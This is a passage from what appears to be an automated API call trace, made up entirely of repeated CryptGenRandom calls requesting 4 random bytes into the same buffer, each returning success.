pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.853] CryptGenRandom (in: 